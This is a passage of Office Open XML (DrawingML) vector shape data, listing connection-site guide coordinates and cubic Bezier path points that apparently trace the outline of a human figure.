                <a:gd name="connsiteX25" fmla="*/ 126465 w 1761754"/>
                <a:gd name="connsiteY25" fmla="*/ 1604616 h 3357575"/>
                <a:gd name="connsiteX26" fmla="*/ 121173 w 1761754"/>
                <a:gd name="connsiteY26" fmla="*/ 1587856 h 3357575"/>
                <a:gd name="connsiteX27" fmla="*/ 114998 w 1761754"/>
                <a:gd name="connsiteY27" fmla="*/ 1533608 h 3357575"/>
                <a:gd name="connsiteX28" fmla="*/ 96474 w 1761754"/>
                <a:gd name="connsiteY28" fmla="*/ 1525670 h 3357575"/>
                <a:gd name="connsiteX29" fmla="*/ 77069 w 1761754"/>
                <a:gd name="connsiteY29" fmla="*/ 1546839 h 3357575"/>
                <a:gd name="connsiteX30" fmla="*/ 60750 w 1761754"/>
                <a:gd name="connsiteY30" fmla="*/ 1627991 h 3357575"/>
                <a:gd name="connsiteX31" fmla="*/ 71776 w 1761754"/>
                <a:gd name="connsiteY31" fmla="*/ 1648279 h 3357575"/>
                <a:gd name="connsiteX32" fmla="*/ 74422 w 1761754"/>
                <a:gd name="connsiteY32" fmla="*/ 1667684 h 3357575"/>
                <a:gd name="connsiteX33" fmla="*/ 52811 w 1761754"/>
                <a:gd name="connsiteY33" fmla="*/ 1670331 h 3357575"/>
                <a:gd name="connsiteX34" fmla="*/ 13559 w 1761754"/>
                <a:gd name="connsiteY34" fmla="*/ 1530521 h 3357575"/>
                <a:gd name="connsiteX35" fmla="*/ 68248 w 1761754"/>
                <a:gd name="connsiteY35" fmla="*/ 1440990 h 3357575"/>
                <a:gd name="connsiteX36" fmla="*/ 84566 w 1761754"/>
                <a:gd name="connsiteY36" fmla="*/ 1410999 h 3357575"/>
                <a:gd name="connsiteX37" fmla="*/ 75304 w 1761754"/>
                <a:gd name="connsiteY37" fmla="*/ 1410999 h 3357575"/>
                <a:gd name="connsiteX38" fmla="*/ 60750 w 1761754"/>
                <a:gd name="connsiteY38" fmla="*/ 1398650 h 3357575"/>
                <a:gd name="connsiteX39" fmla="*/ 73540 w 1761754"/>
                <a:gd name="connsiteY39" fmla="*/ 1347931 h 3357575"/>
                <a:gd name="connsiteX40" fmla="*/ 168805 w 1761754"/>
                <a:gd name="connsiteY40" fmla="*/ 1049347 h 3357575"/>
                <a:gd name="connsiteX41" fmla="*/ 233638 w 1761754"/>
                <a:gd name="connsiteY41" fmla="*/ 925855 h 3357575"/>
                <a:gd name="connsiteX42" fmla="*/ 292737 w 1761754"/>
                <a:gd name="connsiteY42" fmla="*/ 695633 h 3357575"/>
                <a:gd name="connsiteX43" fmla="*/ 292737 w 1761754"/>
                <a:gd name="connsiteY43" fmla="*/ 692104 h 3357575"/>
                <a:gd name="connsiteX44" fmla="*/ 396822 w 1761754"/>
                <a:gd name="connsiteY44" fmla="*/ 527596 h 3357575"/>
                <a:gd name="connsiteX45" fmla="*/ 570592 w 1761754"/>
                <a:gd name="connsiteY45" fmla="*/ 478200 h 3357575"/>
                <a:gd name="connsiteX46" fmla="*/ 596613 w 1761754"/>
                <a:gd name="connsiteY46" fmla="*/ 481728 h 3357575"/>
                <a:gd name="connsiteX47" fmla="*/ 602788 w 1761754"/>
                <a:gd name="connsiteY47" fmla="*/ 482610 h 3357575"/>
                <a:gd name="connsiteX48" fmla="*/ 611168 w 1761754"/>
                <a:gd name="connsiteY48" fmla="*/ 434978 h 3357575"/>
                <a:gd name="connsiteX49" fmla="*/ 577208 w 1761754"/>
                <a:gd name="connsiteY49" fmla="*/ 409839 h 3357575"/>
                <a:gd name="connsiteX50" fmla="*/ 527370 w 1761754"/>
                <a:gd name="connsiteY50" fmla="*/ 366176 h 3357575"/>
                <a:gd name="connsiteX51" fmla="*/ 524724 w 1761754"/>
                <a:gd name="connsiteY51" fmla="*/ 333539 h 3357575"/>
                <a:gd name="connsiteX52" fmla="*/ 534868 w 1761754"/>
                <a:gd name="connsiteY52" fmla="*/ 221074 h 3357575"/>
                <a:gd name="connsiteX53" fmla="*/ 529575 w 1761754"/>
                <a:gd name="connsiteY53" fmla="*/ 172559 h 3357575"/>
                <a:gd name="connsiteX54" fmla="*/ 575885 w 1761754"/>
                <a:gd name="connsiteY54" fmla="*/ 71120 h 3357575"/>
                <a:gd name="connsiteX55" fmla="*/ 704227 w 1761754"/>
                <a:gd name="connsiteY55" fmla="*/ 2318 h 3357575"/>
                <a:gd name="connsiteX56" fmla="*/ 889023 w 1761754"/>
                <a:gd name="connsiteY56" fmla="*/ 113460 h 3357575"/>
                <a:gd name="connsiteX57" fmla="*/ 914162 w 1761754"/>
                <a:gd name="connsiteY57" fmla="*/ 346770 h 3357575"/>
                <a:gd name="connsiteX58" fmla="*/ 893433 w 1761754"/>
                <a:gd name="connsiteY58" fmla="*/ 438506 h 3357575"/>
                <a:gd name="connsiteX59" fmla="*/ 906664 w 1761754"/>
                <a:gd name="connsiteY59" fmla="*/ 461440 h 3357575"/>
                <a:gd name="connsiteX60" fmla="*/ 1169524 w 1761754"/>
                <a:gd name="connsiteY60" fmla="*/ 565526 h 3357575"/>
                <a:gd name="connsiteX61" fmla="*/ 1242296 w 1761754"/>
                <a:gd name="connsiteY61" fmla="*/ 641385 h 3357575"/>
                <a:gd name="connsiteX62" fmla="*/ 1378136 w 1761754"/>
                <a:gd name="connsiteY62" fmla="*/ 937763 h 3357575"/>
                <a:gd name="connsiteX63" fmla="*/ 1597774 w 1761754"/>
                <a:gd name="connsiteY63" fmla="*/ 1321909 h 3357575"/>
                <a:gd name="connsiteX64" fmla="*/ 1613651 w 1761754"/>
                <a:gd name="connsiteY64" fmla="*/ 1379244 h 3357575"/>
                <a:gd name="connsiteX65" fmla="*/ 1678043 w 1761754"/>
                <a:gd name="connsiteY65" fmla="*/ 1372629 h 3357575"/>
                <a:gd name="connsiteX66" fmla="*/ 1708034 w 1761754"/>
                <a:gd name="connsiteY66" fmla="*/ 1366454 h 3357575"/>
                <a:gd name="connsiteX67" fmla="*/ 1711121 w 1761754"/>
                <a:gd name="connsiteY67" fmla="*/ 1365131 h 3357575"/>
                <a:gd name="connsiteX68" fmla="*/ 1751697 w 1761754"/>
                <a:gd name="connsiteY68" fmla="*/ 1384537 h 3357575"/>
                <a:gd name="connsiteX69" fmla="*/ 1753461 w 1761754"/>
                <a:gd name="connsiteY69" fmla="*/ 1398650 h 3357575"/>
                <a:gd name="connsiteX70" fmla="*/ 1749933 w 1761754"/>
                <a:gd name="connsiteY70" fmla="*/ 1478037 h 3357575"/>
                <a:gd name="connsiteX71" fmla="*/ 1727881 w 1761754"/>
                <a:gd name="connsiteY71" fmla="*/ 1538901 h 3357575"/>
                <a:gd name="connsiteX72" fmla="*/ 1685541 w 1761754"/>
                <a:gd name="connsiteY72" fmla="*/ 1563599 h 3357575"/>
                <a:gd name="connsiteX73" fmla="*/ 1639231 w 1761754"/>
                <a:gd name="connsiteY73" fmla="*/ 1548163 h 3357575"/>
                <a:gd name="connsiteX74" fmla="*/ 1602625 w 1761754"/>
                <a:gd name="connsiteY74" fmla="*/ 1525228 h 3357575"/>
                <a:gd name="connsiteX75" fmla="*/ 1587189 w 1761754"/>
                <a:gd name="connsiteY75" fmla="*/ 1530080 h 3357575"/>
                <a:gd name="connsiteX76" fmla="*/ 1580132 w 1761754"/>
                <a:gd name="connsiteY76" fmla="*/ 1556542 h 3357575"/>
                <a:gd name="connsiteX77" fmla="*/ 1549700 w 1761754"/>
                <a:gd name="connsiteY77" fmla="*/ 1571538 h 3357575"/>
                <a:gd name="connsiteX78" fmla="*/ 1496335 w 1761754"/>
                <a:gd name="connsiteY78" fmla="*/ 1528757 h 3357575"/>
                <a:gd name="connsiteX79" fmla="*/ 1415183 w 1761754"/>
                <a:gd name="connsiteY79" fmla="*/ 1418938 h 3357575"/>
                <a:gd name="connsiteX80" fmla="*/ 1309775 w 1761754"/>
                <a:gd name="connsiteY80" fmla="*/ 1264133 h 3357575"/>
                <a:gd name="connsiteX81" fmla="*/ 1289928 w 1761754"/>
                <a:gd name="connsiteY81" fmla="*/ 1240317 h 3357575"/>
                <a:gd name="connsiteX82" fmla="*/ 1193340 w 1761754"/>
                <a:gd name="connsiteY82" fmla="*/ 1095215 h 3357575"/>
                <a:gd name="connsiteX83" fmla="*/ 1110425 w 1761754"/>
                <a:gd name="connsiteY83" fmla="*/ 921445 h 3357575"/>
                <a:gd name="connsiteX84" fmla="*/ 1096753 w 1761754"/>
                <a:gd name="connsiteY84" fmla="*/ 894541 h 3357575"/>
                <a:gd name="connsiteX85" fmla="*/ 1105132 w 1761754"/>
                <a:gd name="connsiteY85" fmla="*/ 1015386 h 3357575"/>
                <a:gd name="connsiteX86" fmla="*/ 1112189 w 1761754"/>
                <a:gd name="connsiteY86" fmla="*/ 1204152 h 3357575"/>
                <a:gd name="connsiteX87" fmla="*/ 1122774 w 1761754"/>
                <a:gd name="connsiteY87" fmla="*/ 1365131 h 3357575"/>
                <a:gd name="connsiteX88" fmla="*/ 1149236 w 1761754"/>
                <a:gd name="connsiteY88" fmla="*/ 1451134 h 3357575"/>
                <a:gd name="connsiteX89" fmla="*/ 1177463 w 1761754"/>
                <a:gd name="connsiteY89" fmla="*/ 1538901 h 3357575"/>
                <a:gd name="connsiteX90" fmla="*/ 1189812 w 1761754"/>
                <a:gd name="connsiteY90" fmla="*/ 1566686 h 3357575"/>
                <a:gd name="connsiteX91" fmla="*/ 1390485 w 1761754"/>
                <a:gd name="connsiteY91" fmla="*/ 1889086 h 3357575"/>
                <a:gd name="connsiteX92" fmla="*/ 1433707 w 1761754"/>
                <a:gd name="connsiteY92" fmla="*/ 1964945 h 3357575"/>
                <a:gd name="connsiteX93" fmla="*/ 1479134 w 1761754"/>
                <a:gd name="connsiteY93" fmla="*/ 2135186 h 3357575"/>
                <a:gd name="connsiteX94" fmla="*/ 1496335 w 1761754"/>
                <a:gd name="connsiteY94" fmla="*/ 2416129 h 3357575"/>
                <a:gd name="connsiteX95" fmla="*/ 1499863 w 1761754"/>
                <a:gd name="connsiteY95" fmla="*/ 2517568 h 3357575"/>
                <a:gd name="connsiteX96" fmla="*/ 1503832 w 1761754"/>
                <a:gd name="connsiteY96" fmla="*/ 2717359 h 3357575"/>
                <a:gd name="connsiteX97" fmla="*/ 1484427 w 1761754"/>
                <a:gd name="connsiteY97" fmla="*/ 3003153 h 3357575"/>
                <a:gd name="connsiteX98" fmla="*/ 1481339 w 1761754"/>
                <a:gd name="connsiteY98" fmla="*/ 3037554 h 3357575"/>
                <a:gd name="connsiteX99" fmla="*/ 1495452 w 1761754"/>
                <a:gd name="connsiteY99" fmla="*/ 3109443 h 3357575"/>
                <a:gd name="connsiteX100" fmla="*/ 1514417 w 1761754"/>
                <a:gd name="connsiteY100" fmla="*/ 3135906 h 3357575"/>
                <a:gd name="connsiteX101" fmla="*/ 1619385 w 1761754"/>
                <a:gd name="connsiteY101" fmla="*/ 3215734 h 3357575"/>
                <a:gd name="connsiteX102" fmla="*/ 1667017 w 1761754"/>
                <a:gd name="connsiteY102" fmla="*/ 3225437 h 3357575"/>
                <a:gd name="connsiteX103" fmla="*/ 1720383 w 1761754"/>
                <a:gd name="connsiteY103" fmla="*/ 3251899 h 3357575"/>
                <a:gd name="connsiteX104" fmla="*/ 1752138 w 1761754"/>
                <a:gd name="connsiteY104" fmla="*/ 3293798 h 3357575"/>
                <a:gd name="connsiteX105" fmla="*/ 1741553 w 1761754"/>
                <a:gd name="connsiteY105" fmla="*/ 3331286 h 3357575"/>
                <a:gd name="connsiteX106" fmla="*/ 1719060 w 1761754"/>
                <a:gd name="connsiteY106" fmla="*/ 3337902 h 3357575"/>
                <a:gd name="connsiteX107" fmla="*/ 1631734 w 1761754"/>
                <a:gd name="connsiteY107" fmla="*/ 3355103 h 3357575"/>
                <a:gd name="connsiteX108" fmla="*/ 1568665 w 1761754"/>
                <a:gd name="connsiteY108" fmla="*/ 3352897 h 3357575"/>
                <a:gd name="connsiteX109" fmla="*/ 1255086 w 1761754"/>
                <a:gd name="connsiteY109" fmla="*/ 3286300 h 3357575"/>
                <a:gd name="connsiteX110" fmla="*/ 1187166 w 1761754"/>
                <a:gd name="connsiteY110" fmla="*/ 3255869 h 3357575"/>
                <a:gd name="connsiteX111" fmla="*/ 1151001 w 1761754"/>
                <a:gd name="connsiteY111" fmla="*/ 3177364 h 3357575"/>
                <a:gd name="connsiteX112" fmla="*/ 1157616 w 1761754"/>
                <a:gd name="connsiteY112" fmla="*/ 3150901 h 3357575"/>
                <a:gd name="connsiteX113" fmla="*/ 1159821 w 1761754"/>
                <a:gd name="connsiteY113" fmla="*/ 3113854 h 3357575"/>
                <a:gd name="connsiteX114" fmla="*/ 1163791 w 1761754"/>
                <a:gd name="connsiteY114" fmla="*/ 3078130 h 3357575"/>
                <a:gd name="connsiteX115" fmla="*/ 1173053 w 1761754"/>
                <a:gd name="connsiteY115" fmla="*/ 3045052 h 3357575"/>
                <a:gd name="connsiteX116" fmla="*/ 1216274 w 1761754"/>
                <a:gd name="connsiteY116" fmla="*/ 2779546 h 3357575"/>
                <a:gd name="connsiteX117" fmla="*/ 1240532 w 1761754"/>
                <a:gd name="connsiteY117" fmla="*/ 2566524 h 3357575"/>
                <a:gd name="connsiteX118" fmla="*/ 1229064 w 1761754"/>
                <a:gd name="connsiteY118" fmla="*/ 2439945 h 3357575"/>
                <a:gd name="connsiteX119" fmla="*/ 1100281 w 1761754"/>
                <a:gd name="connsiteY119" fmla="*/ 2100344 h 3357575"/>
                <a:gd name="connsiteX120" fmla="*/ 1060587 w 1761754"/>
                <a:gd name="connsiteY120" fmla="*/ 2020516 h 3357575"/>
                <a:gd name="connsiteX121" fmla="*/ 1023099 w 1761754"/>
                <a:gd name="connsiteY121" fmla="*/ 1976853 h 3357575"/>
                <a:gd name="connsiteX122" fmla="*/ 921219 w 1761754"/>
                <a:gd name="connsiteY122" fmla="*/ 1878501 h 3357575"/>
                <a:gd name="connsiteX123" fmla="*/ 860796 w 1761754"/>
                <a:gd name="connsiteY123" fmla="*/ 1826018 h 3357575"/>
                <a:gd name="connsiteX124" fmla="*/ 842714 w 1761754"/>
                <a:gd name="connsiteY124" fmla="*/ 1814109 h 3357575"/>
                <a:gd name="connsiteX125" fmla="*/ 779204 w 1761754"/>
                <a:gd name="connsiteY125" fmla="*/ 1829105 h 3357575"/>
                <a:gd name="connsiteX126" fmla="*/ 704227 w 1761754"/>
                <a:gd name="connsiteY126" fmla="*/ 1970238 h 3357575"/>
                <a:gd name="connsiteX127" fmla="*/ 584705 w 1761754"/>
                <a:gd name="connsiteY127" fmla="*/ 2262647 h 3357575"/>
                <a:gd name="connsiteX128" fmla="*/ 559125 w 1761754"/>
                <a:gd name="connsiteY128" fmla="*/ 2366732 h 3357575"/>
                <a:gd name="connsiteX129" fmla="*/ 489882 w 1761754"/>
                <a:gd name="connsiteY129" fmla="*/ 2574462 h 3357575"/>
                <a:gd name="connsiteX130" fmla="*/ 431223 w 1761754"/>
                <a:gd name="connsiteY130" fmla="*/ 2738529 h 3357575"/>
                <a:gd name="connsiteX131" fmla="*/ 369037 w 1761754"/>
                <a:gd name="connsiteY131" fmla="*/ 2964341 h 3357575"/>
                <a:gd name="connsiteX132" fmla="*/ 358893 w 1761754"/>
                <a:gd name="connsiteY132" fmla="*/ 3039759 h 3357575"/>
                <a:gd name="connsiteX133" fmla="*/ 334195 w 1761754"/>
                <a:gd name="connsiteY133" fmla="*/ 3057842 h 3357575"/>
                <a:gd name="connsiteX134" fmla="*/ 316553 w 1761754"/>
                <a:gd name="connsiteY134" fmla="*/ 3078130 h 3357575"/>
                <a:gd name="connsiteX135" fmla="*/ 329343 w 1761754"/>
                <a:gd name="connsiteY135" fmla="*/ 3152224 h 3357575"/>
                <a:gd name="connsiteX136" fmla="*/ 349190 w 1761754"/>
                <a:gd name="connsiteY136" fmla="*/ 3200739 h 3357575"/>
                <a:gd name="connsiteX137" fmla="*/ 322287 w 1761754"/>
                <a:gd name="connsiteY137" fmla="*/ 3239991 h 3357575"/>
                <a:gd name="connsiteX138" fmla="*/ 179390 w 1761754"/>
                <a:gd name="connsiteY138" fmla="*/ 3251017 h 3357575"/>
                <a:gd name="connsiteX139" fmla="*/ 143666 w 1761754"/>
                <a:gd name="connsiteY139" fmla="*/ 3245725 h 3357575"/>
                <a:gd name="connsiteX140" fmla="*/ 109264 w 1761754"/>
                <a:gd name="connsiteY140" fmla="*/ 3207795 h 3357575"/>
                <a:gd name="connsiteX141" fmla="*/ 97356 w 1761754"/>
                <a:gd name="connsiteY141" fmla="*/ 3147373 h 3357575"/>
                <a:gd name="connsiteX142" fmla="*/ 151163 w 1761754"/>
                <a:gd name="connsiteY142" fmla="*/ 3036672 h 33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761754" h="3357575">
                  <a:moveTo>
                    <a:pt x="151163" y="3036672"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="152486" y="3035349"/>
                    <a:pt x="153809" y="3034026"/>
                    <a:pt x="154692" y="3032702"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166600" y="3011974"/>
                    <a:pt x="166600" y="3011974"/>
                    <a:pt x="144989" y="3001830"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131316" y="2995214"/>
                    <a:pt x="118085" y="2988598"/>
                    <a:pt x="106177" y="2978455"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93387" y="2967429"/>
                    <a:pt x="88977" y="2954639"/>
                    <a:pt x="95592" y="2938320"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118967" y="2880544"/>
                    <a:pt x="140578" y="2822327"/>
                    <a:pt x="164394" y="2764550"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196149" y="2687810"/>
                    <a:pt x="207616" y="2606217"/>
                    <a:pt x="223494" y="2525948"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="244223" y="2420980"/>
                    <a:pt x="272890" y="2317777"/>
                    <a:pt x="305527" y="2215897"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="319640" y="2171793"/>
                    <a:pt x="320081" y="2125043"/>
                    <a:pt x="321405" y="2079175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="324051" y="1996259"/>
                    <a:pt x="324051" y="1913343"/>
                    <a:pt x="328902" y="1830428"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="335077" y="1727225"/>
                    <a:pt x="346985" y="1624462"/>
                    <a:pt x="365068" y="1522141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="367273" y="1508910"/>
                    <a:pt x="367273" y="1497443"/>
                    <a:pt x="356247" y="1488181"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="345221" y="1478919"/>
                    <a:pt x="346544" y="1469216"/>
                    <a:pt x="353600" y="1457749"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="418433" y="1355428"/>
                    <a:pt x="446219" y="1239876"/>
                    <a:pt x="461214" y="1122118"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="468271" y="1068752"/>
                    <a:pt x="448424" y="1014945"/>
                    <a:pt x="428136" y="964667"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="419315" y="966872"/>
                    <a:pt x="417992" y="972606"/>
                    <a:pt x="415346" y="977016"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="402115" y="997745"/>
                    <a:pt x="389325" y="1019356"/>
                    <a:pt x="376094" y="1040085"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="344780" y="1088158"/>
                    <a:pt x="330225" y="1141083"/>
                    <a:pt x="320964" y="1197536"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="309055" y="1269866"/>
                    <a:pt x="288327" y="1339992"/>
                    <a:pt x="263628" y="1409235"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="260541" y="1417615"/>
                    <a:pt x="256572" y="1425994"/>
                    <a:pt x="253484" y="1434374"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="248633" y="1447606"/>
                    <a:pt x="240694" y="1447606"/>
                    <a:pt x="231432" y="1440108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="220847" y="1432169"/>
                    <a:pt x="209821" y="1424671"/>
                    <a:pt x="199678" y="1415851"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190416" y="1407471"/>
                    <a:pt x="187328" y="1411881"/>
                    <a:pt x="184241" y="1421143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176744" y="1445400"/>
                    <a:pt x="173215" y="1470540"/>
                    <a:pt x="168805" y="1495679"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163071" y="1528757"/>
                    <a:pt x="153368" y="1560512"/>
                    <a:pt x="138814" y="1590502"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136168" y="1596236"/>
                    <a:pt x="133081" y="1605498"/>
                    <a:pt x="126465" y="1604616"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118085" y="1603293"/>
                    <a:pt x="122055" y="1593590"/>
                    <a:pt x="121173" y="1587856"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118526" y="1569774"/>
                    <a:pt x="116762" y="1551691"/>
                    <a:pt x="114998" y="1533608"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113675" y="1519054"/>
                    <a:pt x="106177" y="1520377"/>
                    <a:pt x="96474" y="1525670"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87653" y="1530521"/>
                    <a:pt x="81920" y="1538019"/>
                    <a:pt x="77069" y="1546839"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63396" y="1571979"/>
                    <a:pt x="61632" y="1599764"/>
                    <a:pt x="60750" y="1627991"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60750" y="1635930"/>
                    <a:pt x="66043" y="1642545"/>
                    <a:pt x="71776" y="1648279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77069" y="1654012"/>
                    <a:pt x="80156" y="1661069"/>
                    <a:pt x="74422" y="1667684"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68689" y="1674741"/>
                    <a:pt x="60309" y="1673859"/>
                    <a:pt x="52811" y="1670331"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3415" y="1644750"/>
                    <a:pt x="-15109" y="1579035"/>
                    <a:pt x="13559" y="1530521"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31200" y="1500530"/>
                    <a:pt x="50165" y="1470981"/>
                    <a:pt x="68248" y="1440990"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73981" y="1431287"/>
                    <a:pt x="79274" y="1421143"/>
                    <a:pt x="84566" y="1410999"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80597" y="1405707"/>
                    <a:pt x="77951" y="1410117"/>
                    <a:pt x="75304" y="1410999"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63396" y="1414968"/>
                    <a:pt x="58545" y="1409235"/>
                    <a:pt x="60750" y="1398650"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64278" y="1381450"/>
                    <a:pt x="68689" y="1364690"/>
                    <a:pt x="73540" y="1347931"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103090" y="1247814"/>
                    <a:pt x="134845" y="1148139"/>
                    <a:pt x="168805" y="1049347"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184241" y="1004801"/>
                    <a:pt x="210263" y="966431"/>
                    <a:pt x="233638" y="925855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="274654" y="854407"/>
                    <a:pt x="298029" y="778989"/>
                    <a:pt x="292737" y="695633"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="292737" y="694309"/>
                    <a:pt x="292737" y="692986"/>
                    <a:pt x="292737" y="692104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="282593" y="608748"/>
                    <a:pt x="322728" y="557587"/>
                    <a:pt x="396822" y="527596"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="452834" y="504662"/>
                    <a:pt x="509729" y="484374"/>
                    <a:pt x="570592" y="478200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="579413" y="477318"/>
                    <a:pt x="588675" y="475113"/>
                    <a:pt x="596613" y="481728"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="598819" y="483492"/>
                    <a:pt x="600583" y="483934"/>
                    <a:pt x="602788" y="482610"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="614696" y="475995"/>
                    <a:pt x="619989" y="446004"/>
                    <a:pt x="611168" y="434978"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="601906" y="423511"/>
                    <a:pt x="591762" y="415131"/>
                    <a:pt x="577208" y="409839"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="556038" y="401900"/>
                    <a:pt x="540160" y="385582"/>
                    <a:pt x="527370" y="366176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="520755" y="356032"/>
                    <a:pt x="518549" y="345447"/>
                    <a:pt x="524724" y="333539"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="542807" y="297374"/>
                    <a:pt x="546776" y="260326"/>
                    <a:pt x="534868" y="221074"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="530016" y="205637"/>
                    <a:pt x="529575" y="188878"/>
                    <a:pt x="529575" y="172559"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="529134" y="131543"/>
                    <a:pt x="541924" y="97142"/>
                    <a:pt x="575885" y="71120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="614696" y="41130"/>
                    <a:pt x="654831" y="12021"/>
                    <a:pt x="704227" y="2318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="775676" y="-12236"/>
                    <a:pt x="868735" y="43776"/>
                    <a:pt x="889023" y="113460"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="911075" y="189760"/>
                    <a:pt x="922542" y="267383"/>
                    <a:pt x="914162" y="346770"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="910634" y="377643"/>
                    <a:pt x="901372" y="408075"/>
                    <a:pt x="893433" y="438506"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="889905" y="452179"/>
                    <a:pt x="893874" y="457030"/>
                    <a:pt x="906664" y="461440"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="995754" y="492754"/>
                    <a:pt x="1083962" y="524950"/>
                    <a:pt x="1169524" y="565526"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1204366" y="581844"/>
                    <a:pt x="1226859" y="605660"/>
                    <a:pt x="1242296" y="641385"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1285077" y="741501"/>
                    <a:pt x="1321242" y="845145"/>
                    <a:pt x="1378136" y="937763"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1455759" y="1063460"/>
                    <a:pt x="1523679" y="1194449"/>
                    <a:pt x="1597774" y="1321909"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1607477" y="1338228"/>
                    <a:pt x="1626441" y="1351459"/>
                    <a:pt x="1613651" y="1379244"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1637467" y="1363808"/>
                    <a:pt x="1656873" y="1362926"/>
                    <a:pt x="1678043" y="1372629"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1687305" y="1376598"/>
                    <a:pt x="1699654" y="1376598"/>
                    <a:pt x="1708034" y="1366454"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1708916" y="1366013"/>
                    <a:pt x="1710239" y="1365572"/>
                    <a:pt x="1711121" y="1365131"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1738907" y="1352782"/>
                    <a:pt x="1744640" y="1355869"/>
                    <a:pt x="1751697" y="1384537"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1752579" y="1389388"/>
                    <a:pt x="1751256" y="1394681"/>
                    <a:pt x="1753461" y="1398650"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1767574" y="1425994"/>
                    <a:pt x="1761841" y="1451575"/>
                    <a:pt x="1749933" y="1478037"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1741112" y="1497443"/>
                    <a:pt x="1738465" y="1519495"/>
                    <a:pt x="1727881" y="1538901"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1715972" y="1561835"/>
                    <a:pt x="1711562" y="1564922"/>
                    <a:pt x="1685541" y="1563599"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
